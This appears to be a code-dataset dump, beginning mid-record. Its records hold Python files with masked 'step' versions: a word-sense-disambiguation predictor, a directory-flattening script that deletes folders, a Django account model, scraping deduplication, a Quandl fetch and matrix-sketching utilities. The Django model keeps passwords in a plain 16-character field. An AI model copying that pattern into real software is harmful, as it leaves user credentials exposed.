sense\n :param vocab: the vocab needed for giving a sense\n :param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. 
Need to consult the vocab.\n :return: the chosen sense with the MFS technique\n \"\"\"\n pos = parola.get('pos')\n pos_input = __decide_pos(pos)\n wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)\n try:\n wordnet_object = wordnet_object[0]\n except:\n print(wordnet_object)\n print(parola.text)\n wn_synset = \"wn:\" + str(wordnet_object.offset()).zfill(8) + wordnet_object.pos()\n the_actual_meaning = next(key for key, value in vocab.items() if wn_synset in value)\n to_return = __extrapolate_value_for_MFS(the_actual_meaning,vocab=vocab2, pred_case=pred_case)\n return to_return\n\n\ndef __extrapolate_value_for_MFS(value: object, pred_case: int = 1, vocab: Dict = None) -> str:\n \"\"\"\n Taking either a List or String in input, that represents the found Babelnet ID, this function handles it and return a string that contains the value of the prediction\n :param value: The Value from which to extrapolate the actual meaning found\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab: The vocab in support of mode 2 or 3.\n :return: the actual meaning found with MFS\n \"\"\"\n the_meaning_to_explot = __type_checker(value)\n if pred_case == 1:\n return the_meaning_to_explot\n if pred_case == 2:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0] if to_return else \"factotum\"\n if pred_case == 3:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0]\n\ndef __type_checker(value: object) -> str:\n \"\"\"\n Checks the type of the object and, accordingly, returns it\n :param value: the value to examinate\n :return: a string that is the value expected\n \"\"\"\n if type(value) == str:\n return value\n if type(value) == list:\n return value[0]\n\ndef __decide_pos(pos: str) -> str:\n \"\"\"\n Decides the WN representation of the given pos in input\n :param pos: the pos to interpret with WordNet\n :return: the WN representation of the given pos\n \"\"\"\n to_return = None\n if pos == 'NOUN':\n to_return = \"n\"\n if pos == 'VERB':\n to_return = 'v'\n if pos == 'ADJ':\n to_return = 'a'\n if pos == 'ADV':\n to_return = 'r'\n return to_return\n\n\ndef convert_from_wnlist_2_bnlist(list_of_bn: List, vocab: Dict) -> List:\n \"\"\"\n Cast the given list (which contains only WN ids) to Babelnet IDs\n :param list_of_bn: the list to cast\n :param vocab: the vocabulary to use to perform the conversion\n :return: the converted list\n \"\"\"\n list_of_possible_senses_bn_version = []\n for candidate in list_of_bn:\n is_it_here = next(key for key, value in vocab.items() if candidate in value)\n if is_it_here:\n list_of_possible_senses_bn_version.append(is_it_here if type(is_it_here) == str else is_it_here[0])\n return list_of_possible_senses_bn_version\n\ndef create_custom_label(list_of_possible_senses: List, word: str, vocab: Dict, predictions, enable_coarse_grained: int = 1) -> List:\n \"\"\"\n Converts the list of babelnet IDS to a number and outputs the converted list\n :param list_of_possible_senses: the list that contains all the babelnet's IDs\n :param word: the word for which we are predicting the sense in a specific moment\n :param vocab: the vocabulary Word -> Serial to exploit for the conversion\n :param 
predictions: the predictions made by the system\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to None. Possible values:\n 1 --> The flow will still be the same\n 2,3 -> Flow will change, triggering the first step for the coarse-grained approach.\n :return: a List with the IDs converted\n \"\"\"\n to_return = []\n list_of_indices_to_delete = []\n for indice in range(len(list_of_possible_senses)):\n new_string = word + \"_\" + list_of_possible_senses[indice] if enable_coarse_grained == 1 else list_of_possible_senses[indice]\n conversion = None\n try:\n conversion = int(vocab[new_string])\n to_return.append(predictions[conversion])\n except:\n list_of_indices_to_delete.append(indice)\n continue\n if list_of_indices_to_delete:\n list_of_possible_senses = [list_of_possible_senses[prov_index] for prov_index in range(len(list_of_possible_senses)) if prov_index not in list_of_indices_to_delete]\n return to_return, list_of_possible_senses\n\n\n\nif __name__ == \"__main__\":\n predict_babelnet(\"/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml\", \"../output\", \"/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources\")\n #predict_wordnet_domains(\"/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml\", \"../output\", \"/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources\")\n #predict_lexicographer(\"/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml\", \"../output\", \"/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources\")\n", "step-ids": [ 7, 9, 11, 12, 15 ] }
[ 7, 9, 11, 12, 15 ]
import os
import shutil

# root_path = '../from_1691'
root_path = 'C:/Users/koyou/Desktop/test'

# Since mistakes can happen, set dry_run to decide whether to only print the log
# or to actually perform the operations as well.
# dry_run = True
dry_run = False

def move_directory(input_directory_path, output_directory_path):
    print("moving %s to %s" % (input_directory_path, output_directory_path))
    if not dry_run:
        shutil.move(input_directory_path, output_directory_path)


#
# main
#
print("Root dir is %s" % root_path)

for level1 in os.listdir(root_path):  # level1 == test1
    level1_path = os.path.join(root_path, level1)
    if os.path.isdir(level1_path):
        # Print the directory name so the progress can be followed
        print("> %s" % level1)

        for level2 in os.listdir(level1_path):  # level2 == test1-1
            level2_path = os.path.join(level1_path, level2)
            if os.path.isdir(level2_path):
                # Print the level2 name
                print(">> %s" % level2)

                move_directory(level2_path, root_path)

        # 2. deleting dir
        print("Deleting %s" % level1_path)
        if not dry_run:
            shutil.rmtree(level1_path)
normal
{ "blob_id": "7de19a85a6a05bd2972b11571d5f05219c6beb1a", "index": 916, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef move_directory(input_directory_path, output_directory_path):\n print('moving %s to %s' % (input_directory_path, output_directory_path))\n if not dry_run:\n shutil.move(input_directory_path, output_directory_path)\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef move_directory(input_directory_path, output_directory_path):\n print('moving %s to %s' % (input_directory_path, output_directory_path))\n if not dry_run:\n shutil.move(input_directory_path, output_directory_path)\n\n\nprint('Root dir is %s' % root_path)\nfor level1 in os.listdir(root_path):\n level1_path = os.path.join(root_path, level1)\n if os.path.isdir(level1_path):\n print('> %s' % level1)\n for level2 in os.listdir(level1_path):\n level2_path = os.path.join(level1_path, level2)\n if os.path.isdir(level2_path):\n print('>> %s' % level2)\n move_directory(level2_path, root_path)\n print('Deleting %s' % level1_path)\n if not dry_run:\n shutil.rmtree(level1_path)\n", "step-4": "<mask token>\nroot_path = 'C:/Users/koyou/Desktop/test'\ndry_run = False\n\n\ndef move_directory(input_directory_path, output_directory_path):\n print('moving %s to %s' % (input_directory_path, output_directory_path))\n if not dry_run:\n shutil.move(input_directory_path, output_directory_path)\n\n\nprint('Root dir is %s' % root_path)\nfor level1 in os.listdir(root_path):\n level1_path = os.path.join(root_path, level1)\n if os.path.isdir(level1_path):\n print('> %s' % level1)\n for level2 in os.listdir(level1_path):\n level2_path = os.path.join(level1_path, level2)\n if os.path.isdir(level2_path):\n print('>> %s' % level2)\n move_directory(level2_path, root_path)\n print('Deleting %s' % level1_path)\n if not dry_run:\n shutil.rmtree(level1_path)\n", "step-5": "import os\nimport shutil\n\n# root_path = '../from_1691'\nroot_path = 'C:/Users/koyou/Desktop/test'\n\n# 실수할 수도 있으므로 dry_run 을 설정해서 로그만 찍을 것인지\n# 실제 작동도 진행할 것인지 결정한다.\n# dry_run = True\ndry_run = False\n\ndef move_directory(input_directory_path, output_directory_path):\n print(\"moving %s to %s\" % (input_directory_path, output_directory_path))\n if not dry_run:\n shutil.move(input_directory_path, output_directory_path)\n\n\n#\n# main\n#\nprint(\"Root dir is %s\" % root_path)\n\nfor level1 in os.listdir(root_path): # level1 == test1\n level1_path = os.path.join(root_path, level1)\n if os.path.isdir(level1_path):\n # 디렉토리 이름을 출력해줘야 진행상황 알 수 있음\n print(\"> %s\" % level1)\n\n for level2 in os.listdir(level1_path): # level2 == test1-1\n level2_path = os.path.join(level1_path, level2)\n if os.path.isdir(level2_path):\n # level2 이름 출력\n print(\">> %s\" % level2)\n\n move_directory(level2_path, root_path)\n\n # 2. deleting dir\n print(\"Deleting %s\" % level1_path)\n if not dry_run:\n shutil.rmtree(level1_path)\n", "step-ids": [ 0, 1, 2, 3, 5 ] }
[ 0, 1, 2, 3, 5 ]
import datetime
from django.db import models

from django.utils import timezone


class Acoount(models.Model):
    first_name = models.CharField("Ім\'я", max_length=50)
    last_name = models.CharField('Прізвище', max_length=50)
    username = models.CharField('Псевдонім', max_length=50)
    email = models.CharField('Електронна почта', max_length=16)
    password = models.CharField('Пароль', max_length=16)

    def __str__(self):
        return self.first_name + ' ' + self.last_name

    class Meta:
        verbose_name = 'Акаунт'
        verbose_name_plural = 'Акаунти'
normal
{ "blob_id": "18c2fe40b51ad1489d55aa2be068a1c4f381a2a5", "index": 553, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Acoount(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n verbose_name = 'Акаунт'\n verbose_name_plural = 'Акаунти'\n", "step-3": "<mask token>\n\n\nclass Acoount(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.first_name + ' ' + self.last_name\n\n\n class Meta:\n verbose_name = 'Акаунт'\n verbose_name_plural = 'Акаунти'\n", "step-4": "import datetime\nfrom django.db import models\nfrom django.utils import timezone\n\n\nclass Acoount(models.Model):\n first_name = models.CharField(\"Ім'я\", max_length=50)\n last_name = models.CharField('Прізвище', max_length=50)\n username = models.CharField('Псевдонім', max_length=50)\n email = models.CharField('Електронна почта', max_length=16)\n password = models.CharField('Пароль', max_length=16)\n\n def __str__(self):\n return self.first_name + ' ' + self.last_name\n\n\n class Meta:\n verbose_name = 'Акаунт'\n verbose_name_plural = 'Акаунти'\n", "step-5": "import datetime\nfrom django.db import models\n\nfrom django.utils import timezone\n\n\nclass Acoount(models.Model):\n first_name = models.CharField(\"Ім\\'я\", max_length=50)\n last_name = models.CharField('Прізвище', max_length=50)\n username = models.CharField('Псевдонім', max_length=50)\n email = models.CharField('Електронна почта', max_length=16)\n password = models.CharField('Пароль', max_length=16)\n \n\n\n def __str__(self):\n return self.first_name + ' ' + self.last_name\n\n class Meta:\n verbose_name = 'Акаунт'\n verbose_name_plural = 'Акаунти'", "step-ids": [ 0, 1, 2, 4, 5 ] }
[ 0, 1, 2, 4, 5 ]
from page_parsing import get_item_info_from,url_list,item_info,get_links_from


# ================================================= < < URL de-duplication > > ========================================

# Design approach:
# 1. Use two databases: the first one only stores the crawled urls (url_list); the second stores the item detail info for each url (item_info)
# 2. While writing data into the second database during crawling, add a field (key) 'index_url', i.e. the link that the detail page corresponds to
# 3. If crawling is interrupted, the url field in the second (detail-info) database should be a subset of the url set in the first database
# 4. Subtracting the two url sets gives the remaining urls that still need to be crawled


db_urls = [item['url'] for item in url_list.find()]      # use a list comprehension to collect all the urls to crawl
index_urls = [item['url'] for item in item_info.find()]  # all urls already present in the detail-info database
x = set(db_urls)                                         # convert to the set data structure
y = set(index_urls)
rest_of_urls = x-y                                       # set difference

# ======================================================================================================================
normal
{ "blob_id": "4f2017632d905c80c35fbaead83ecb7e1ac95760", "index": 9868, "step-1": " from page_parsing import get_item_info_from,url_list,item_info,get_links_from\n\n\n # ================================================= < <链接去重 > > =====================================================\n\n # 设计思路:\n # 1.分两个数据库,第一个用于只用于存放抓取下来的 url (ulr_list);第二个则储存 url 对应的物品详情信息(item_info)\n # 2.在抓取过程中在第二个数据库中写入数据的同时,新增一个字段(key) 'index_url' 即该详情对应的链接\n # 3.若抓取中断,在第二个存放详情页信息的数据库中的 url 字段应该是第一个数据库中 url 集合的子集\n # 4.两个集合的 url 相减得出剩下应该抓取的 url 还有哪些\n\n\n db_urls = [item['url'] for item in url_list.find()] # 用列表解析式装入所有要爬取的链接\n index_urls = [item['url'] for item in item_info.find()] # 所引出详情信息数据库中所有的现存的 url 字段\n x = set(db_urls) # 转换成集合的数据结构\n y = set(index_urls)\n rest_of_urls = x-y # 相减\n\n # ======================================================================================================================\n\n\n\n\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
#Function to remove spaces in a string

def remove(string_input):
    return string_input.replace(" ", "")
normal
{ "blob_id": "f327f408ae2759407ac9f01ad4feff5c6a0845f1", "index": 9524, "step-1": "<mask token>\n", "step-2": "def remove(string_input):\n return string_input.replace(' ', '')\n", "step-3": "#Function to remove spaces in a string\n\ndef remove(string_input):\n return string_input.replace(\" \", \"\")\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
import requests
import json
import pandas as pd
n1 = 'ADS'
api_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1
df = pd.read_csv(api_url)
df = df.head(100)
print(df.head())
#print(list(data))
normal
{ "blob_id": "3dd4b4d4241e588cf44230891f496bafb30c6153", "index": 46, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint(df.head())\n", "step-3": "<mask token>\nn1 = 'ADS'\napi_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1\ndf = pd.read_csv(api_url)\ndf = df.head(100)\nprint(df.head())\n", "step-4": "import requests\nimport json\nimport pandas as pd\nn1 = 'ADS'\napi_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1\ndf = pd.read_csv(api_url)\ndf = df.head(100)\nprint(df.head())\n", "step-5": "\n\nimport requests\nimport json\nimport pandas as pd\nn1 = 'ADS'\napi_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1\ndf = pd.read_csv(api_url)\ndf = df.head(100)\nprint(df.head())\n#print(list(data))\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
# coding=utf-8
# Copyright 2019 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

""" Common methods shared by MNIST and ImageNet experiments."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import os
import errno
import getpass

import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt


# mkdir -p in Python >2.5
def mkdir_p(path):
  try:
    os.makedirs(path, mode=0o755)
  except OSError as exc:  # Python >2.5
    if exc.errno == errno.EEXIST and os.path.isdir(path):
      pass
    else:
      raise


# Returns path to postfix under user's Unix home directory.
def make_experiment_dir(postfix):
  home = os.path.expanduser('~')
  exp_dir = os.path.join(home, postfix)
  mkdir_p(exp_dir)
  return exp_dir


# appends .png to file name
def save_fig(folder, filename):
  if folder is None:
    return
  filename_out = os.path.join(folder, filename + '.png')
  print('saving {}'.format(filename_out))
  with open(filename_out, 'w') as out_file:
    plt.savefig(out_file)


# appends .txt to file name
def save_array(x, folder, filename, formatting):
  if folder is None:
    return
  filename_out = os.path.join(folder, filename + '.txt')
  print('saving {}'.format(filename_out))
  with open(filename_out, 'w') as out_file:
    np.savetxt(out_file, x, fmt=formatting)


def load_array(filename):
  with open(filename, 'r') as f:
    return np.loadtxt(f)


# count parameters for svd truncation
def count_parameters_list(k_values, nrows, ncols):
  new_list = []
  for k in k_values:
    new_k = count_parameters(k, nrows, ncols)
    new_list.append(new_k)
  return new_list


# number of parameters when nrows-by-ncols matrix is approximated
# with product of nrows-by-rank and rank-by-ncolds matrix.
def count_parameters(rank, nrows, ncols):
  return (nrows + ncols) * rank


# Return one random rademacher matrix
def fully_random_rademacher_matrix(nrows, ncols):
  plus_minus_one = np.array([-1, 1], dtype=np.float32)
  return np.random.choice(plus_minus_one, (nrows, ncols))


# Return a rank-1 Rademacher matrix
def rank1_rademacher(nrows, ncols):
  plus_minus_one = np.array([-1, 1], dtype=np.float32)
  column_vector = np.random.choice(plus_minus_one, (nrows, 1))
  row_vector = np.random.choice(plus_minus_one, (1, ncols))
  # Plain * is quicker than equivalent np.dot(column_vector, row_vector)
  return column_vector * row_vector


# Sketch matrix A
def sketch_matrix(A, sketch_type, k):
  tf.logging.info('sketch_matrix %s %d', sketch_type, k)
  h1 = A.shape[0]
  h2 = A.shape[1]
  # Numpy defaults to int64 or float64 (double precision).
  # Computing with float32 (single precision) is quicker.
  A_hat = np.zeros((h1, h2), dtype=np.float32)
  for i in range(0, k):
    tf.logging.log_every_n(tf.logging.INFO, 'sketch_matrix %s iter %d/%d', 1000,
                           sketch_type, i, k)
    # generate random matrix
    if sketch_type == 'arora':
      mat = fully_random_rademacher_matrix(h1, h2)
    elif sketch_type == 'our_sketch':
      mat = rank1_rademacher(h1, h2)
    else:
      print('wrong sketch_type variable')
      return -1
    # get coefficient
    coefficient = np.dot(np.ravel(A), np.ravel(mat))
    # add coefficient*matrix to A_hat
    A_hat += coefficient * mat
  tf.logging.info('Done sketch_matrix %s %d', sketch_type, k)
  return (1.0 / k) * A_hat


# Return truncated svd of A, where only the top k components are used.
# Adding --copt=-mavx --copt=-mavx2 --copt=-mfma compiler flags
# speeds up svd by almost 2x. However it makes sketching, which is dominant,
# a tiny bit slower and hence it's not worth it.
def truncated_svd(A, k):
  tf.logging.info('Computing SVD ...')
  u, s, v = np.linalg.svd(A, full_matrices=False)
  u_trunc = u[:, 0:k]
  s_trunc = s[0:k]
  v_trunc = v[0:k, :]
  A_hat = np.dot(u_trunc, np.dot(np.diag(s_trunc), v_trunc))
  tf.logging.info('Done computing SVD ...')
  return A_hat


# num_params is rank for SVD, number of coefficients for sketches.
def compress(A, compression_type, num_params):
  if compression_type == 'svd':
    A_hat = truncated_svd(A, num_params)
  elif compression_type == 'our_sketch' or compression_type == 'arora':
    A_hat = sketch_matrix(A, compression_type, num_params)
  else:
    print('Error: wrong compression type. Must be svd, our_sketch, or arora.')
  return A_hat


# return singular values of A sorted in descending order
def singular_values(A):
  u, s, v = np.linalg.svd(A)
  sing = sorted(s, reverse=True)
  return sing


def plot_and_save_singular_values(s, folder, fn, nrows, ncols):
  x = range(1, len(s) + 1)
  y = sorted(s, reverse=True)
  title = 'Singular values\ndim = (' + str(nrows) + 'x' + str(ncols) + ')'
  plt.plot(x, y)
  plt.title(title)
  plt.tight_layout()
  save_fig(folder, fn)
  save_array(np.array(s), folder, fn + '_vals', '%.18e')
{ "blob_id": "f253816d08407950caad28f1ce630ac2b099aa70", "index": 3241, "step-1": "<mask token>\n\n\ndef make_experiment_dir(postfix):\n home = os.path.expanduser('~')\n exp_dir = os.path.join(home, postfix)\n mkdir_p(exp_dir)\n return exp_dir\n\n\ndef save_fig(folder, filename):\n if folder is None:\n return\n filename_out = os.path.join(folder, filename + '.png')\n print('saving {}'.format(filename_out))\n with open(filename_out, 'w') as out_file:\n plt.savefig(out_file)\n\n\n<mask token>\n\n\ndef count_parameters_list(k_values, nrows, ncols):\n new_list = []\n for k in k_values:\n new_k = count_parameters(k, nrows, ncols)\n new_list.append(new_k)\n return new_list\n\n\ndef count_parameters(rank, nrows, ncols):\n return (nrows + ncols) * rank\n\n\ndef fully_random_rademacher_matrix(nrows, ncols):\n plus_minus_one = np.array([-1, 1], dtype=np.float32)\n return np.random.choice(plus_minus_one, (nrows, ncols))\n\n\n<mask token>\n\n\ndef sketch_matrix(A, sketch_type, k):\n tf.logging.info('sketch_matrix %s %d', sketch_type, k)\n h1 = A.shape[0]\n h2 = A.shape[1]\n A_hat = np.zeros((h1, h2), dtype=np.float32)\n for i in range(0, k):\n tf.logging.log_every_n(tf.logging.INFO,\n 'sketch_matrix %s iter %d/%d', 1000, sketch_type, i, k)\n if sketch_type == 'arora':\n mat = fully_random_rademacher_matrix(h1, h2)\n elif sketch_type == 'our_sketch':\n mat = rank1_rademacher(h1, h2)\n else:\n print('wrong sketch_type variable')\n return -1\n coefficient = np.dot(np.ravel(A), np.ravel(mat))\n A_hat += coefficient * mat\n tf.logging.info('Done sketch_matrix %s %d', sketch_type, k)\n return 1.0 / k * A_hat\n\n\ndef truncated_svd(A, k):\n tf.logging.info('Computing SVD ...')\n u, s, v = np.linalg.svd(A, full_matrices=False)\n u_trunc = u[:, 0:k]\n s_trunc = s[0:k]\n v_trunc = v[0:k, :]\n A_hat = np.dot(u_trunc, np.dot(np.diag(s_trunc), v_trunc))\n tf.logging.info('Done computing SVD ...')\n return A_hat\n\n\ndef compress(A, compression_type, num_params):\n if compression_type == 'svd':\n A_hat = truncated_svd(A, num_params)\n elif compression_type == 'our_sketch' or compression_type == 'arora':\n A_hat = sketch_matrix(A, compression_type, num_params)\n else:\n print(\n 'Error: wrong compression type. 
Must be svd, our_sketch, or arora.'\n )\n return A_hat\n\n\ndef singular_values(A):\n u, s, v = np.linalg.svd(A)\n sing = sorted(s, reverse=True)\n return sing\n\n\ndef plot_and_save_singular_values(s, folder, fn, nrows, ncols):\n x = range(1, len(s) + 1)\n y = sorted(s, reverse=True)\n title = 'Singular values\\ndim = (' + str(nrows) + 'x' + str(ncols) + ')'\n plt.plot(x, y)\n plt.title(title)\n plt.tight_layout()\n save_fig(folder, fn)\n save_array(np.array(s), folder, fn + '_vals', '%.18e')\n", "step-2": "<mask token>\n\n\ndef make_experiment_dir(postfix):\n home = os.path.expanduser('~')\n exp_dir = os.path.join(home, postfix)\n mkdir_p(exp_dir)\n return exp_dir\n\n\ndef save_fig(folder, filename):\n if folder is None:\n return\n filename_out = os.path.join(folder, filename + '.png')\n print('saving {}'.format(filename_out))\n with open(filename_out, 'w') as out_file:\n plt.savefig(out_file)\n\n\ndef save_array(x, folder, filename, formatting):\n if folder is None:\n return\n filename_out = os.path.join(folder, filename + '.txt')\n print('saving {}'.format(filename_out))\n with open(filename_out, 'w') as out_file:\n np.savetxt(out_file, x, fmt=formatting)\n\n\ndef load_array(filename):\n with open(filename, 'r') as f:\n return np.loadtxt(f)\n\n\ndef count_parameters_list(k_values, nrows, ncols):\n new_list = []\n for k in k_values:\n new_k = count_parameters(k, nrows, ncols)\n new_list.append(new_k)\n return new_list\n\n\ndef count_parameters(rank, nrows, ncols):\n return (nrows + ncols) * rank\n\n\ndef fully_random_rademacher_matrix(nrows, ncols):\n plus_minus_one = np.array([-1, 1], dtype=np.float32)\n return np.random.choice(plus_minus_one, (nrows, ncols))\n\n\n<mask token>\n\n\ndef sketch_matrix(A, sketch_type, k):\n tf.logging.info('sketch_matrix %s %d', sketch_type, k)\n h1 = A.shape[0]\n h2 = A.shape[1]\n A_hat = np.zeros((h1, h2), dtype=np.float32)\n for i in range(0, k):\n tf.logging.log_every_n(tf.logging.INFO,\n 'sketch_matrix %s iter %d/%d', 1000, sketch_type, i, k)\n if sketch_type == 'arora':\n mat = fully_random_rademacher_matrix(h1, h2)\n elif sketch_type == 'our_sketch':\n mat = rank1_rademacher(h1, h2)\n else:\n print('wrong sketch_type variable')\n return -1\n coefficient = np.dot(np.ravel(A), np.ravel(mat))\n A_hat += coefficient * mat\n tf.logging.info('Done sketch_matrix %s %d', sketch_type, k)\n return 1.0 / k * A_hat\n\n\ndef truncated_svd(A, k):\n tf.logging.info('Computing SVD ...')\n u, s, v = np.linalg.svd(A, full_matrices=False)\n u_trunc = u[:, 0:k]\n s_trunc = s[0:k]\n v_trunc = v[0:k, :]\n A_hat = np.dot(u_trunc, np.dot(np.diag(s_trunc), v_trunc))\n tf.logging.info('Done computing SVD ...')\n return A_hat\n\n\ndef compress(A, compression_type, num_params):\n if compression_type == 'svd':\n A_hat = truncated_svd(A, num_params)\n elif compression_type == 'our_sketch' or compression_type == 'arora':\n A_hat = sketch_matrix(A, compression_type, num_params)\n else:\n print(\n 'Error: wrong compression type. 
Must be svd, our_sketch, or arora.'\n )\n return A_hat\n\n\ndef singular_values(A):\n u, s, v = np.linalg.svd(A)\n sing = sorted(s, reverse=True)\n return sing\n\n\ndef plot_and_save_singular_values(s, folder, fn, nrows, ncols):\n x = range(1, len(s) + 1)\n y = sorted(s, reverse=True)\n title = 'Singular values\\ndim = (' + str(nrows) + 'x' + str(ncols) + ')'\n plt.plot(x, y)\n plt.title(title)\n plt.tight_layout()\n save_fig(folder, fn)\n save_array(np.array(s), folder, fn + '_vals', '%.18e')\n", "step-3": "<mask token>\n\n\ndef make_experiment_dir(postfix):\n home = os.path.expanduser('~')\n exp_dir = os.path.join(home, postfix)\n mkdir_p(exp_dir)\n return exp_dir\n\n\ndef save_fig(folder, filename):\n if folder is None:\n return\n filename_out = os.path.join(folder, filename + '.png')\n print('saving {}'.format(filename_out))\n with open(filename_out, 'w') as out_file:\n plt.savefig(out_file)\n\n\ndef save_array(x, folder, filename, formatting):\n if folder is None:\n return\n filename_out = os.path.join(folder, filename + '.txt')\n print('saving {}'.format(filename_out))\n with open(filename_out, 'w') as out_file:\n np.savetxt(out_file, x, fmt=formatting)\n\n\ndef load_array(filename):\n with open(filename, 'r') as f:\n return np.loadtxt(f)\n\n\ndef count_parameters_list(k_values, nrows, ncols):\n new_list = []\n for k in k_values:\n new_k = count_parameters(k, nrows, ncols)\n new_list.append(new_k)\n return new_list\n\n\ndef count_parameters(rank, nrows, ncols):\n return (nrows + ncols) * rank\n\n\ndef fully_random_rademacher_matrix(nrows, ncols):\n plus_minus_one = np.array([-1, 1], dtype=np.float32)\n return np.random.choice(plus_minus_one, (nrows, ncols))\n\n\ndef rank1_rademacher(nrows, ncols):\n plus_minus_one = np.array([-1, 1], dtype=np.float32)\n column_vector = np.random.choice(plus_minus_one, (nrows, 1))\n row_vector = np.random.choice(plus_minus_one, (1, ncols))\n return column_vector * row_vector\n\n\ndef sketch_matrix(A, sketch_type, k):\n tf.logging.info('sketch_matrix %s %d', sketch_type, k)\n h1 = A.shape[0]\n h2 = A.shape[1]\n A_hat = np.zeros((h1, h2), dtype=np.float32)\n for i in range(0, k):\n tf.logging.log_every_n(tf.logging.INFO,\n 'sketch_matrix %s iter %d/%d', 1000, sketch_type, i, k)\n if sketch_type == 'arora':\n mat = fully_random_rademacher_matrix(h1, h2)\n elif sketch_type == 'our_sketch':\n mat = rank1_rademacher(h1, h2)\n else:\n print('wrong sketch_type variable')\n return -1\n coefficient = np.dot(np.ravel(A), np.ravel(mat))\n A_hat += coefficient * mat\n tf.logging.info('Done sketch_matrix %s %d', sketch_type, k)\n return 1.0 / k * A_hat\n\n\ndef truncated_svd(A, k):\n tf.logging.info('Computing SVD ...')\n u, s, v = np.linalg.svd(A, full_matrices=False)\n u_trunc = u[:, 0:k]\n s_trunc = s[0:k]\n v_trunc = v[0:k, :]\n A_hat = np.dot(u_trunc, np.dot(np.diag(s_trunc), v_trunc))\n tf.logging.info('Done computing SVD ...')\n return A_hat\n\n\ndef compress(A, compression_type, num_params):\n if compression_type == 'svd':\n A_hat = truncated_svd(A, num_params)\n elif compression_type == 'our_sketch' or compression_type == 'arora':\n A_hat = sketch_matrix(A, compression_type, num_params)\n else:\n print(\n 'Error: wrong compression type. 
Must be svd, our_sketch, or arora.'\n )\n return A_hat\n\n\ndef singular_values(A):\n u, s, v = np.linalg.svd(A)\n sing = sorted(s, reverse=True)\n return sing\n\n\ndef plot_and_save_singular_values(s, folder, fn, nrows, ncols):\n x = range(1, len(s) + 1)\n y = sorted(s, reverse=True)\n title = 'Singular values\\ndim = (' + str(nrows) + 'x' + str(ncols) + ')'\n plt.plot(x, y)\n plt.title(title)\n plt.tight_layout()\n save_fig(folder, fn)\n save_array(np.array(s), folder, fn + '_vals', '%.18e')\n", "step-4": "<mask token>\n\n\ndef mkdir_p(path):\n try:\n os.makedirs(path, mode=493)\n except OSError as exc:\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise\n\n\ndef make_experiment_dir(postfix):\n home = os.path.expanduser('~')\n exp_dir = os.path.join(home, postfix)\n mkdir_p(exp_dir)\n return exp_dir\n\n\ndef save_fig(folder, filename):\n if folder is None:\n return\n filename_out = os.path.join(folder, filename + '.png')\n print('saving {}'.format(filename_out))\n with open(filename_out, 'w') as out_file:\n plt.savefig(out_file)\n\n\ndef save_array(x, folder, filename, formatting):\n if folder is None:\n return\n filename_out = os.path.join(folder, filename + '.txt')\n print('saving {}'.format(filename_out))\n with open(filename_out, 'w') as out_file:\n np.savetxt(out_file, x, fmt=formatting)\n\n\ndef load_array(filename):\n with open(filename, 'r') as f:\n return np.loadtxt(f)\n\n\ndef count_parameters_list(k_values, nrows, ncols):\n new_list = []\n for k in k_values:\n new_k = count_parameters(k, nrows, ncols)\n new_list.append(new_k)\n return new_list\n\n\ndef count_parameters(rank, nrows, ncols):\n return (nrows + ncols) * rank\n\n\ndef fully_random_rademacher_matrix(nrows, ncols):\n plus_minus_one = np.array([-1, 1], dtype=np.float32)\n return np.random.choice(plus_minus_one, (nrows, ncols))\n\n\ndef rank1_rademacher(nrows, ncols):\n plus_minus_one = np.array([-1, 1], dtype=np.float32)\n column_vector = np.random.choice(plus_minus_one, (nrows, 1))\n row_vector = np.random.choice(plus_minus_one, (1, ncols))\n return column_vector * row_vector\n\n\ndef sketch_matrix(A, sketch_type, 